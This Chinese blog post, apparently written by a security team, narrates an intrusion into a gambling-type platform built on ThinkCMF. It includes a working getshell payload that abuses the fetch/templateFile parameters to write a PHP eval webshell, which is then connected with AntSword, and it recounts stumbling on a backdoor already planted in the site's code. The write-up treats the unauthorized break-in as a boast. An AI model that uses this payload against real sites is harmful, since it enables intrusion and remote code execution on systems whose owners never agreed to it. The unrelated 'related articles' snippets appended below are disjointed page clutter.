渗透小计之「竟然有人在wangle平台代码里下毒」

访客4年前黑客工具778

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

进去之后在url处构造报错

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

黑客测试仪(检测黑客入侵)

黑客测试仪(检测黑客入侵)

汽车检测仪里的Scan文件可以删除吗? 1、在行车记录仪上找到文件管理功能,在文件管理里删除掉不需要的行车记录即可。如果安装的行车记录仪没有这个功能,就只能取出储存卡,用读卡器删除掉部分行车记录。2、...

给水饺店铺取名大全(84个高端名字)

顺口两个字给水饺店铺取名一个字给水饺店铺名字大全 铜钱给水饺官方店铺   戽、陨、锭   对折给水饺直销店铺   准、邮、外   泥沼给水饺旗舰店铺   春、燕、呼   口才给水饺特价店铺  ...

怎么赚钱最快?赚钱最快的三个方法

怎么赚钱最快?赚钱最快的三个方法

赚钱不努力,努力不赚钱!你会发现一个现象,自己很辛苦也很努力地去工作,甚至连假节日都不敢休息,平时也很节俭,也没买什么奢侈品,每个月也都有存钱。但是就是不知道为什么,钱存得很慢,一年到头来存钱的速度还...

爆Twitter存在安全漏洞,可泄漏电话号码的国家/地区代码

爆Twitter存在安全漏洞,可泄漏电话号码的国家/地区代码

【猎云网(微信号:)】12月18日报道(编译:福尔摩望) 据悉,Twitter被爆存在一个安全漏洞,不法分子可以通过该漏洞提取帐号电话号码的国家代码,并查看该帐号是否被Twitter锁定。这一消...

南湖秋水夜无烟?南湖秋月夜无烟南湖指什么

南湖秋水夜无烟?南湖秋月夜无烟南湖指什么

“南湖秋水夜无烟, 耐可乘流直上天。 且就洞庭赊月色, 将船买酒白云边。 唐朝李白《陪族叔刑部侍郎晔及中书贾舍人至游洞庭五首》节录   初衣解诗:本地中秋,今日午间高温高达38度。这是...

菲总统杜特尔特签署奖倪志福逝世学金法案鼓励医学生返乡

  中新网马尼拉1月5日电 (记者 关向东)当地时间1月5日,菲律宾总统发言人哈里·洛克在新闻发布会上宣布,菲律宾总统杜特尔特在2020年12月23日签署了第11509号共和国法案《医学生奖学金法案》...